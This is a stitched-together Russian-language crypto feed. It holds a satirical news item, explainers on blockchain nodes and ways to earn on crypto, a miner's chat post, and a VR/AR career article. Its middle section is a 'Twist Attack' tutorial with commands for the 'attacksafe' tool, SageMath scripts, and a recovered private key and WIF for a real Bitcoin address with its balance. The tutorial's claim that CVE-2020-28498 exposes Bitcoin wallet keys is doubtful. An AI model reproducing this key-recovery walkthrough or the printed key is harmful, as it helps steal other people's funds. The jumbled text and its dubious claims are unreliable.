«Не вдаваясь в технические тонкости, можно очень просто описать алгоритм работы. Как известно, цена монеты падает, когда её продают.  Когда же её покупают, цена растёт. Мы использовали этот факт при создании Skolcoin, – рассказывает Чернышенко. – При помощи трёхфакторной аутентификации мы добились того, что инвесторы могут только покупать у нас эти монеты, но не могут их продавать, передавать друг другу или обменивать на что-либо, поскольку наша система авторизации транзакций этого не позволяет. Таким образом, монету будут всё время покупать, а её курс будет непрерывно расти. Так инвесторы смогут сэкономить свои деньги».

Источник "новости" - ИА Панорама )

הצלב סיבוב

6

Вращение Треугольника

Quadratum Rotatione

Bloom

TrueBloom

Все мы знаем о об особенности блокчейн-технологий, состоящей в децентрализации. Прозрачность транзакций и неизменность данных в блоке открывают все больше возможностей не только при торговых операциях на рынке, но и в других сферах деятельности человека.

А задумывались ли вы, благодаря чему мы можем пользоваться всеми плюсами децентрализованных активов? Сегодня мы рассмотрим такой термин, как “Нода” — ключевой элемент работы блокчейна.

Что такое нода?

Нода или блокчейн-узел — это участник блокчейн-сети, который обеспечивает ее достаточными для работы ресурсами. Он реализует алгоритмы блокчейн-протокола, позволяющие проверять транзакции и обеспечивать безопасность сети.

Становление децентрализации выглядит следующим образом:

блокчейн-узлы постоянно взаимодействуют друг с другом, работая как единый прозрачный организм, заменяющий централизованный орган. А чем больше узлов, тем более децентрализованной является сеть.

Алгоритм консенсуса

У каждой сети блокчейн есть свой способ валидации блоков, благодаря которым обеспечивается децентрализация. Самыми популярными алгоритмами консенсуса являются Proof-of-Work (PoW) и Proof-of-Stake (PoS). Рассмотрим их ближе:

• PoW является традиционным и первым алгоритмом, который используется в одноранговой (P2P) сети криптовалюты Bitcoin с начала своего создания. Суть его заключается в том, что нодами выступает компьютер, имеющий достаточную мощность для валидации блоков.

Простым языком, PoW-валидация — это и есть майнинг криптовалют, где ноды получают вознаграждение за валидацию блока.

• PoS, в свою очередь, как более энергоэффективный метод задействует собственные монеты, замороженные в кошельке пользователя. Валидация блоков происходит благодаря хранению суммы в смарт-контракте с целью обеспечения работы сети.

Данный алгоритм консенсуса известен как стейкинг.

Как работает нода?

Как мы упомянули ранее, основная роль блокчейн-узла — валидация транзакций. Когда пользователь отправляет транзакцию, она принимается узлом, который проверяет ее и разрешает отправку в пункт назначения.

Тот факт, что каждый из участвующих узлов проверяет транзакции, помогает защитить сеть. Недействительная транзакция может быть одобрена только в том случае, если 51% всех нод в сети подтвердят ее. В блокчейн-сетях с сотнями или тысячами нод это крайне маловероятно.

Перед тем как вложить деньги в проект, всегда исследуйте бэкграунд и принцип работы конкретных узлов блокчейна. Это даст вам возможность получить более точное представление о том, насколько криптовалюта безопасна.

Виды блокчейн-узлов

Блокчейн-сети могут содержать различные типы узлов. К ним относятся полные узлы, майнинг-ноды, SPV-клиенты и суперноды:

Полные узлы (full nodes) — незаменимые для сети участники блокчейна. Эти узлы называются проверяющими и участвуют в проверке блоков.

Узел отслеживания (Supernode) — по своей сути, это полный узел, выполняющий функцию своеобразного моста для передачи истории и данных в блокчейне другим узлам.

Майнер ноды — специализированные узлы, направленные на валидацию блоков через протоколы алгоритма Proof-of-Work. При работе с блокчейном майнер отталкивается от своих вычислительных возможностей и подключается к соло-майнингу (решение блока собственными силами), либо к майнинг-пулам (“сервера”, к которым подключаются валидаторы и общими усилиями подтверждают блоки).

SPV (Simplified Payment Verification) — клиенты, не имеющие полного объема работы узлов. Благодаря данному элементу участник может проверить информацию о транзакциях в блоке, предоставленную полными узлами.

Заключение

Узлы имеют решающее значение для работы блокчейн-сети, поскольку они обеспечивают честность всех участников и целостность обрабатываемых данных. Большинство блокчейн-сетей используют денежные выплаты (майнинг или стейкинг), чтобы мотивировать пользователей к участию.

Сами по себе узлы являются ключевым элементом децентрализованной экосистемы, без которых технология блокчейн была бы лишена той прозрачности, которую мы имеем сейчас.

Источник: Что такое нода в блокчейне? - NFT-ARTY

CRYPTO DEEP TECH

Не так давно пакет elliptic (6.5.4) для стандартных эллиптических кривых был уязвим для различных атак, одним из которых является Twist Attack. Криптографическая проблема была в реализации secp256k1. Нам известно что криптовалюта Биткоин использует secp256k1 и эта атака не обошла Биткоин стороной, согласно уязвимости CVE-2020-28498 подтверждающие стороны транзакции алгоритма ECDSA через определенные точки на эллиптической кривой secp256k1 передавали частичные значение приватного ключа (более простые подгруппы состоящие от 5 до 45 bit )
которые называются секстическими поворотами [sextic twists] этот процесс настолько опасен что раскрывает зашифрованные данные после выполнения ряда операций ECC.

В этой статье мы реализуем Twist Attack на примере и покажем как с помощью определенных точек на эллиптической кривой secp256k1 мы можем получить частичные значение приватного ключа и в течение 5-15 минут восстановить Биткоин Кошелек используя “Sagemath pollard rho function: (discrete_log_rho)” и “Chinese Remainder Theorem”.

Другими словами эти определенные точки являются злонамеренно выбранными точками на эллиптической кривой secp256k1

https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md

Согласно твиту Paulo Barreto: https://twitter.com/pbarreto/status/825703772382908416?s=21

The cofactor is 3^2*13^2*3319*22639

E1: 20412485227 E2: 3319, 22639 E3: 109903, 12977017, 383229727 E4: 18979 E6: 10903, 5290657, 10833080827, 22921299619447 prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447 38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031 HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5

При запуске Twist Attack «приватный ключ» может быть получен при определенном выборе «публичного ключа» (выбранная точка эллиптической кривой secp256k1) , то есть значение в транзакции раскрывается.
После чего раскроется и информация о приватном ключе, но для этого нужно выполнить несколько операций ECC.

E1: y^2 = x^3 + 1 E2: y^2 = x^3 + 2 E3: y^2 = x^3 + 3 E4: y^2 = x^3 + 4 E6: y^2 = x^3 + 6

https://attacksafe.ru/twist-attack-on-bitcoin

y² = x³ + ax + b. In the Koblitz curve, y² = x³ + 0x + 7. In the Koblitz curve, 0 = x³ + 0 + 7 b '= -x ^ 3 - ax.

Все точки (x, 0) попадают на недопустимые кривые с b '= -x ^ 3 - ax

Перейдем к экспериментальной части:

(Рассмотрим Биткоин Адрес)

1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq

(Теперь рассмотрим критический уязвимые транзакции)

https://btc1.trezor.io/tx/d76a7daa4c5f67a2b553df96834845e4bf469a9806b3de1d89e107301230e731

Откроем [TerminalGoogleColab].

Реализуем алгоритм Twist Attack с помощью нашей репозитории 18TwistAttack

git clone https://github.com/demining/CryptoDeepTools.git cd CryptoDeepTools/18TwistAttack/ ls

Установим все нужные нам пакеты

requirements.txt

sudo apt install python2-minimal wget https://bootstrap.pypa.io/pip/2.7/get-pip.py sudo python2 get-pip.py pip2 install -r requirements.txt

,

Подготовим RawTX для атаки

1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq

https://btc1.trezor.io/tx/d76a7daa4c5f67a2b553df96834845e4bf469a9806b3de1d89e107301230e731

RawTX = 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Сохраним в файле: RawTX.txt

RawTX.txt

Чтобы реализовать атаку мы воспользуемся программным обеспечение “ATTACKSAFE SOFTWARE”

www.attacksafe.ru/software

Права доступа:

chmod +x attacksafe

Применение:

./attacksafe -help

-version: software version -list: list of bitcoin attacks -tool: indicate the attack -gpu: enable gpu -time: work timeout -server: server mode -port: server port -open: open file -save: save file -search: vulnerability search -stop: stop at mode -max: maximum quantity in mode -min: minimum quantity per mode -speed: boost speed for mode -range: specific range -crack: crack mode -field: starting field -point: starting point -inject: injection regimen -decode: decoding mode

./attacksafe -version

Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023]

"ATTACKSAFE SOFTWARE" включает в себя все популярные атаки на Биткоин.

Запустим список всех атак:

./attacksafe -list

Выберем -tool: twist_attack

Чтобы получить определенные точки secp256k1 из уязвимой транзакции подписи ECDSA, мы добавили данные RawTX в текстовый документ и сохранил как файл RawTX.txt

0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Запустим -tool twist_attack используя программное обеспечение “ATTACKSAFE SOFTWARE”

./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt

Мы запустили данную атаку из -tool twist_attack и результат сохранился в файл SecretPoints.txt

Теперь чтобы посмотреть успешный результат откроем файл SecretPoints.txt

cat SecretPoints.txt

Результат:

Elliptic Curve Secret Points: Q11 = E1([34618671789393965854613640290360235391647615481000045539933705415932995630501, 99667531170720247708472095466452031806107030061686920872303526306525502090483]) Q21 = E2([68702062392910446859944685018576437177285905222869560568664822150761686878291, 78930926874118321017229422673239275133078679240453338682049329315217408793256]) Q22 = E2([36187226669165513276610993963284034580749604088670076857796544959800936658648, 78047996896912977465701149036258546447875229540566494608083363212907320694556]) Q31 = E3([14202326166782503089885498550308551381051624037047010679115490407616052746319, 30141335236272151189582083030021707964727207106390862186771517460219968539461]) Q32 = E3([92652014076758100644785068345546545590717837495536733539625902385181839840915, 110864801034380605661536039273640968489603707115084229873394641092410549997600]) Q33 = E3([13733962489803830542904605575055556603039713775204829607439941608751927073977, 70664870695578622971339822919870548708506276012055865037147804103600164648175]) Q41 = E4([46717592694718488699519343483827728052018707080103013431011626167943885955457, 6469304805650436779501027074909634426373884406581114581098958955015476304831]) Q61 = E6([47561520942485905499349109889401345889145902913672896164353162929760278620178, 23509073020931558264499314846549082835888014703370452565866789873039982616042]) Q62 = E6([54160295444050675202099928029758489687871616334443609215013972520342661686310, 61948858375012652103923933825519305763658240249902247802977736768072021476029]) Q63 = E6([80766121303237997819855855617475110324697780810565482439175845706674419107782, 43455623036669369134087288965186672649514660807369135243341314597351364060230]) Q64 = E6([27687597533944257266141093122549631098147853637408570994849207294960615279263, 8473112666362672787600475720236754473089370067288223871796416412432107486062]) RawTX = 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

Теперь добавим полученные точки secp256k1

Для этого откроем Python-script: discrete.py

Для того чтобы запустить Python-script: discrete.py установим SageMath

Команда установки:

sudo apt-get update sudo apt-get install -y python3-gmpy2 yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath

Проверим установку SageMath по команде: sage -v

SageMath version 9.0

Чтобы решить дискретное логарифмирование (Pollard's rho algorithm for logarithms) запустим Python-script: discrete.py

Команда запуска:

sage -python3 discrete.py

Результат:

Discrete_log_rho: 5663673254 229 19231 43549 11713353 47161820 13016 6068 1461826 5248038982 9034433903442 PRIVATE KEY: 4843137891892877119728403798088723017104154997204069979961743654961499092503

privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64])

Мы решили дискретное логарифмирование и с помощью “Китайской теоремы об остатках (Chinese remainder theorem)” получили приватный ключ в десятичном формате.

Конвертируем приватный ключ в HEX формат

Десятичный формат приватного ключа был сохранен в файл: privkey.txt

Запустим Python-script: privkey2hex.py

python3 privkey2hex.py cat privkey2hex.txt

Откроем полученный файл: privkey2hex.txt

Приватный ключ в HEX формате:

PrivKey = 0ab51e7092866dadf86165ea0d70beb69086237a0e7f5a123d496d3d98e03617

Откроем bitaddress и проверим:

ADDR: 1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq WIF: KwaXPrvbWF5USy3GCh453UDGWXnBSroiKKtE6ebtmHHxGKaRmVD6 HEX: 0AB51E7092866DADF86165EA0D70BEB69086237A0E7F5A123D496D3D98E03617

https://live.blockcypher.com/btc/address/1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq/

BALANCE: $ 775.77

Исходный код

ATTACKSAFE SOFTWARE

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/S_ZUcM2cD8I

Источник: https://cryptodeep.ru/twist-attack

Криптоанализ

Распространенные способы заработка на криптовалюте.

Все не ограничивается банальным трейдингом (куплей-продажей), хотя о нем мы также поговорим. Существую пассивные способы заработка на монетах, например:

• стейкинг;

• лендинг;

• криптофонды.

Но и это не все. Можно зарабатывать на майнинге или эирдропах, участвуя в реферальных программах, либо просто удерживая актив длительное время в соответствии со стратегией HOLD.

Трейдинг

Самый распространенный способ заработка на крипте. Заключается в покупке актива по низкой рыночной цене во время просадки и его дальнейшей перепродаже по более высокой цене на подъеме. Трейдинг различается в зависимости от частоты заключения сделок. Кто-то перепродает криптоактив в течение нескольких дней, а кто-то предпочитает внутридневные торги. Некоторые игроки заключают десятки сделок в течение пары часов, ставя крупные суммы на незначительные ценовые колебания.

Аирдропы

Airdrop предполагает раздачу бесплатной криптовалюты или токенов пользователям, владеющим определенной монетой. Зачем бесплатно раздавать людям ценные активы? Уже задали себе такой вопрос? Ответ на него прост, благодаря эирдропам создатели монет убивают сразу несколько зайцев:

• работают на распространение своего проекта;

• увеличивают оборот своих токенов/криптовалют;

• решают проблему волатильности (токены/крипту, полученную бесплатно, предпочитают удерживать, а не сразу продавать);

Для участия в Airdrop вам может потребоваться определенный токен или установленный минимальный баланс кошельке. Перед раздачей эирдропа разработчики сообщают о планируемом событии на своем сайте или на сторонних веб-ресурсах.

Невзаимозаменяемые токены - NFT

NFT это уникальные объекты цифрового искусства, созданные на базе блокчейн технологии. Картинки, музыкальные композиции или внутриигровое снаряжение – все это невзаимозаменяемые токены. Их можно приобрести на специальных площадках вроде OpenSea.

Стратегия заработка здесь такая же, как и в случае с приобретением привычных нам произведений искусства. Представьте, как люди предлагают свою цену на картину известного художника в ходе аукциона. Участник, предложивший больше всего – забирает картину себе. Далее он либо хранит её для удовлетворения эстетических потребностей, либо продает дороже через какое-то время. Эта же схема работает с NFT. Вы можете либо перепродать токен, который забрали с торгов, либо вовсе запустить собственный НФТ и выставить его на продажу.

Стейкинг

Аналог банковского депозита. Инвестор хранит на электронном счету необходимое число монет и получает за этой процентный доход. Чем больше средств зарезервировано для стейкинга, тем больше доход. Однако есть несколько нюансов, о которых нужно помнить. Во-первых, стейкинг не доступен для всех цифровых монет. Во-вторых, стоимость зарезервированной валюты может упасть, либо проект, за которым она закреплена вовсе прекратит существование. Тогда инвестора ждут большие убытки.

Токенсейлы

Если переводить дословно с английского языка token sail это «продажа токенов». Основатели проекта предоставляют инвесторам ранний доступ к своим токенам/альткоинам, до их листинга на бирже. Какую выгоду получают стороны от участия в токен сейлах?

• Инвесторы таким образом получают прибыль. Цена актива во время token sail намного ниже, чем на вторичном рынке.

• Основатели проекта привлекают ранние инвестиции для реализации своих производственных планов. Одновременно с этим они рекламируют свой продукт.

Процедура токен сейла состоит из 3 этапов:

• Private sale. На этом этапе актив продается близкому для разработчиков кругу лиц, либо крупным инвесторам.

• Presale. Цена на этом этапе уже выше, чем на предыдущем. Приобрести токен/альткоин можно предварительно попав в «white list». Основная цель presale – пиар продукта.

• Public sale. Этап продажи на открытых рынках.

Амбассадорские программы

Способ заработка чем-то отдаленно похож на партнерскую сеть. Подойдет для владельцев крупных аккаунтов в социальных сетях, этаких «инфлюенсеров». От блогера требуется пиар цифрового продукта, взамен на материальное вознаграждение (как правило в той же электронной валюте).

Чтобы стать амбассадором нужно посетить официальный сайт разработчика и заполнить там анкету на сотрудничество (если она вообще есть). Блогер оставляет ссылку на свой аккаунты в социальных сетях и указывает дополнительную информацию о себе. Некоторые проекты заинтересованы исключительно в англоговорящих партнерах, такое тоже не редкость.

После заполнения анкеты остается только ждать. Обычно ответное сообщение приходит на почту. В нем разработчики либо подтверждают заинтересованность в сотрудничестве, либо вежливо отказывают.

Резюме

показали инструменты для разного входа в криптовалюту, и "большим кошельком" и практически без него. Возможность заработать найдется всегда, было бы желание. в каждом инструменте необходимо инвестировать свои финансы или свое время. Развивайся! Учись!

Про каждый инструмент более подробно и с примерами показываем на нашем канале.
Материал не является персональной инвестиционной рекомендацией! Инвестиции в криптовалюты являются высокорискованными!

Еще больше о крипте в ТГ-канале

Ложусь я значит спать, и просыпаюсь от кучи сообщений от знакомых с криками зайди на бинанс и посмотри биток, а тут это. Честно говоря не верил что биток будет дальше расти, но у него было свое мнение, так мало этого, доходность асиков увеличилась на 10 процентов, как и мой крипто-портфель. Все же считаю, что это манипуляция на рынке, да бы заскамить хомяков, хоть они уже шортят. Кстати говоря со свечой я угадал и она была на вырост, за этот спор получил 1000 руб.

Доходность, другие профитные монеты, настройки и новости по майнингу можно найти у меня в тг: https://t.me/YazikMinera

Перспективы блокчейна необъятны. С каждым днем мы видим больше технологий, применяющих принцип работы цепи блоков в нашей жизни. Безопасное приобретение активов, NFT, аренда автомобилей, логистика и, конечно же, целые виртуальные миры – метавселенные, в которых каждый человек найдет себе занятие по душе.

Раз мир виртуальный, то и для большего погружения нам нужны специальные устройства.

Однажды мы уже писали про специалиста, который создает и проектирует специальную гарнитуру.

А что насчет человека, профессия которого заключается в создании программной среды для интеграции вышеописанных продуктов?

Друзья, сегодня мы поговорим о таком специалисте как AR VR разработчик, без которого применение гарнитуры по назначению было бы невозможным.

Кто он такой?

Разработчик VR/AR-среды – незаменимый специалист, создающий программы для подключения устройств и из бесперебойной работы (синхронизация, определение, интеграция). Еще недавно VR-технологии применялись лишь в играх, но сейчас спектр использования велик — от медицины до метавселенных (кстати, медицина в метавселенных тоже есть).

Чем предстоит заниматься?

Профиль работы подразумевает разработку ПО и работу с релевантными обязанностями.

Рассмотрим их ближе:

• VR разработка/создание AR приложений;

• Разработка концептов и внедрение новых функций;

• Планирование развития продукта;

• Тестирование и проверка кода;

• Выявление всевозможных рисков и спектра функциональных возможностей в процессе работы;

• Поддержка потенциала регулярного улучшения рабочих процессов;

• Составление и ведение документации к программному обеспечению.

Как стать VR/AR-разработчиком?

Здесь стоит указать на важный момент — мы говорим об IT-специалисте, занимающимся написанием кода. Здесь мы выделяем ключевые навыки, на обучение которым стоит сделать акцент:

1. Языки программирования и 3D-движки (Unreal Engine, Unity, C++ и др.)

2. SDK (Software Development Kits) для работы и тестирования программ

3. VR-гарнитура/AR-устройство для непосредственной работы с проектом

Для изучения вышеописанных пунктов вам необходимы знания технического английского языка (работа с интерфейсом и объектами) и уверенное владение ПК (что вполне вписывается в картину специалиста, в чьи обязанности входит непосредственная работа за компьютером).

Перспективы

Спрос на разработчиков виртуальной и дополненной реальности увеличивается с каждым годом. Технология расширенной реальности взяла свой старт в основном с игровых проектов, но успешно обосновалась в различных отраслях, к примеру: образование, здравоохранение и военные разработки.

Программная эволюция открыла великолепный мир, полный возможностей для разработчиков как виртуальной, так и дополненной реальностей.

Таким образом, мы имеем следующую картину: заработная плата VR/AR-разработчика в среднем составляет $95 тысяч в год, что говорит о высокой востребованности специалиста данного вида деятельности.

Будьте уверены, благодаря все большему принятию блокчейна зарплата с высокой долей вероятности вырастет в разы.

Источник: VR/AR-разработчик. Кто он и как им стать? - NFT-ARTY